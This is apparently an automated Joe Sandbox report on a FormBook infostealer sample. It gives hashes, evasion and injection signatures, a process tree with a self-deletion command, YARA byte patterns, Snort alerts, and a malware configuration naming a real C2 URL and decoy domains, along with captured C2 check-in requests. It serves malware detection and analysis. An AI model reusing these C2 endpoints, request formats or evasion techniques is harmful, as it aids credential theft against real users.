Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tlBHrCrteFXy8Jz.exe

Overview

General Information

Sample Name:tlBHrCrteFXy8Jz.exe
Analysis ID:562118
MD5:0e9943c0e2afaf5e9acec16ce184b444
SHA1:dc1c5f809a3e6e9a3358878d455cb235d2245460
SHA256:dc368951f1df68a92c51f9afe6ad73c717b040fb9af6a278e9201b176362ed70
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • tlBHrCrteFXy8Jz.exe (PID: 6248 cmdline: "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe" MD5: 0E9943C0E2AFAF5E9ACEC16CE184B444)
    • tlBHrCrteFXy8Jz.exe (PID: 7160 cmdline: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe MD5: 0E9943C0E2AFAF5E9ACEC16CE184B444)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 1292 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 5280 cmdline: /c del "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.meizi.ltd/b3xd/"], "decoy": ["nestonconstruction.com", "ratnainternational.com", "3bersaudara.com", "scottkmoody.store", "1metroband.com", "prechit.com", "desertbirdmercantile.com", "marciabernice.com", "packard.vote", "selo.global", "fourthandwhiteoak.com", "ecoplagas.online", "api-jipotvcom.xyz", "shabellafurniture.com", "maxmonacomarble.com", "imprimiruncalendario.com", "cochepordinero.net", "teamosu.club", "therightleftfoot.com", "mitt-masters.com", "transformeddestiny.com", "vzyz.top", "perfectotr.com", "rnhapr.com", "polebear.xyz", "tiatapa.com", "plick-click.com", "losfantasticos.com", "georgemacpherson.xyz", "sadiknitwears.com", "hpmetaverse.com", "smart-life-hacks.com", "gpowermall.com", "codegreenautomation.com", "investment-scientist.com", "igthksolution.com", "lrtlffnr.xyz", "ecomm-hub.com", "99ganbi.top", "quaked.net", "teliazepte.com", "www24fa.top", "nobleslim.com", "hsbsr9s.sbs", "yetiecoolerusa.com", "hourly.limo", "idesignuix.com", "fun4freegames.com", "wxqfilm.com", "auburnfuid.com", "chengxinyuan.online", "yzztx.com", "huggsforbubbs.com", "cdrbk.com", "eclipses.today", "sigmamu.com", "5pineridge.com", "lowfrictionvideo.com", "ord12route.art", "accreditslots.com", "madeitinhome.com", "insurance.pink", "thietkenoithatvanphong.asia", "gkynykj.com"]}
SourceRuleDescriptionAuthorStrings
0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x6af8:$sqlite3text: 68 38 2A 90 C5
    • 0x6c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries
      SourceRuleDescriptionAuthorStrings
      11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        0.2.tlBHrCrteFXy8Jz.exe.335d944.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 24 entries
            No Sigma rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.meizi.ltd/b3xd/"], "decoy": ["nestonconstruction.com", "ratnainternational.com", "3bersaudara.com", "scottkmoody.store", "1metroband.com", "prechit.com", "desertbirdmercantile.com", "marciabernice.com", "packard.vote", "selo.global", "fourthandwhiteoak.com", "ecoplagas.online", "api-jipotvcom.xyz", "shabellafurniture.com", "maxmonacomarble.com", "imprimiruncalendario.com", "cochepordinero.net", "teamosu.club", "therightleftfoot.com", "mitt-masters.com", "transformeddestiny.com", "vzyz.top", "perfectotr.com", "rnhapr.com", "polebear.xyz", "tiatapa.com", "plick-click.com", "losfantasticos.com", "georgemacpherson.xyz", "sadiknitwears.com", "hpmetaverse.com", "smart-life-hacks.com", "gpowermall.com", "codegreenautomation.com", "investment-scientist.com", "igthksolution.com", "lrtlffnr.xyz", "ecomm-hub.com", "99ganbi.top", "quaked.net", "teliazepte.com", "www24fa.top", "nobleslim.com", "hsbsr9s.sbs", "yetiecoolerusa.com", "hourly.limo", "idesignuix.com", "fun4freegames.com", "wxqfilm.com", "auburnfuid.com", "chengxinyuan.online", "yzztx.com", "huggsforbubbs.com", "cdrbk.com", "eclipses.today", "sigmamu.com", "5pineridge.com", "lowfrictionvideo.com", "ord12route.art", "accreditslots.com", "madeitinhome.com", "insurance.pink", "thietkenoithatvanphong.asia", "gkynykj.com"]}
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: www.meizi.ltd/b3xd/Avira URL Cloud: Label: malware
            Source: tlBHrCrteFXy8Jz.exeJoe Sandbox ML: detected
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: tlBHrCrteFXy8Jz.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: tlBHrCrteFXy8Jz.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: explorer.pdbUGP source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.375162074.0000000003380000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: ASCIIEncodi.pdb source: tlBHrCrteFXy8Jz.exe
            Source: Binary string: wntdll.pdbUGP source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374179231.0000000001530000.00000040.00000800.00020000.00000000.sdmp, tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374555186.000000000164F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.512009666.000000000530F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.510583143.00000000051F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374179231.0000000001530000.00000040.00000800.00020000.00000000.sdmp, tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374555186.000000000164F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000010.00000002.512009666.000000000530F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.510583143.00000000051F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: explorer.pdb source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.375162074.0000000003380000.00000040.10000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi

            Networking

            barindex
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49805 -> 162.241.24.116:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49805 -> 162.241.24.116:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49805 -> 162.241.24.116:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49824 -> 160.153.136.3:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49824 -> 160.153.136.3:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49824 -> 160.153.136.3:80
            Source: C:\Windows\explorer.exeDomain query: www.thietkenoithatvanphong.asia
            Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
            Source: C:\Windows\explorer.exeNetwork Connect: 222.255.46.12 80
            Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.116 80
            Source: C:\Windows\explorer.exeDomain query: www.desertbirdmercantile.com
            Source: C:\Windows\explorer.exeDomain query: www.yzztx.com
            Source: C:\Windows\explorer.exeDomain query: www.sigmamu.com
            Source: C:\Windows\explorer.exeNetwork Connect: 154.214.67.82 80
            Source: Malware configuration extractorURLs: www.meizi.ltd/b3xd/
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
            Source: global trafficHTTP traffic detected: GET /b3xd/?qPYT=aV9tZ&iRah=Ie1PhgByqbmAnBTD/2NTTWN841CMZzf2VbgiXa4AsIuYcZI/bp6cv0uoISKMiipyVSmV9CFFiA== HTTP/1.1Host: www.desertbirdmercantile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /b3xd/?iRah=JdJx4d7W9+IGJje0hU/QcPoKaGdRUKvyvIN3jQdk7kxI7FpVQbo1IF0KYDc1cvBgS1iZcvDTaA==&qPYT=aV9tZ HTTP/1.1Host: www.thietkenoithatvanphong.asiaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /b3xd/?qPYT=aV9tZ&iRah=u1+lAjLBA2+kcdvhq4UZu/nPbWuE94hnVKEDKIE9CxGJPgk2ISTbeIcckL5CyvhDdyZbFg7D5w== HTTP/1.1Host: www.yzztx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /b3xd/?iRah=5GWj3iokSHma3YiDoT3m16TCcfPCT77oIBdOELLk89ETJqvKsRjgRlGfGSz2uWFXBl65BQRHGg==&qPYT=aV9tZ HTTP/1.1Host: www.sigmamu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 13:03:13 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.desertbirdmercantile.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 61 76 61 64 61 2d 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 77 69 64 65 20 61 76 61 64 61 2d 68 74 6d 6c 2d 68 65 61 64 65 72 2d 70 6f 73 69 74 69 6f 6e 2d 74 6f 70 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 09 0d 0a Data Ascii: e9<!DOCTYPE html><html class="avada-html-layout-wide avada-html-header-position-top" lang="en-US"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.iandreev.com
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.iandreev.com/
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 0000000D.00000000.404330090.0000000006870000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.347608168.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.317325369.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.331095005.0000000006840000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302412697.0000000001977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoX
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: unknownDNS traffic detected: queries for: www.desertbirdmercantile.com
            Source: global trafficHTTP traffic detected: GET /b3xd/?qPYT=aV9tZ&iRah=Ie1PhgByqbmAnBTD/2NTTWN841CMZzf2VbgiXa4AsIuYcZI/bp6cv0uoISKMiipyVSmV9CFFiA== HTTP/1.1Host: www.desertbirdmercantile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /b3xd/?iRah=JdJx4d7W9+IGJje0hU/QcPoKaGdRUKvyvIN3jQdk7kxI7FpVQbo1IF0KYDc1cvBgS1iZcvDTaA==&qPYT=aV9tZ HTTP/1.1Host: www.thietkenoithatvanphong.asiaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /b3xd/?qPYT=aV9tZ&iRah=u1+lAjLBA2+kcdvhq4UZu/nPbWuE94hnVKEDKIE9CxGJPgk2ISTbeIcckL5CyvhDdyZbFg7D5w== HTTP/1.1Host: www.yzztx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /b3xd/?iRah=5GWj3iokSHma3YiDoT3m16TCcfPCT77oIBdOELLk89ETJqvKsRjgRlGfGSz2uWFXBl65BQRHGg==&qPYT=aV9tZ HTTP/1.1Host: www.sigmamu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
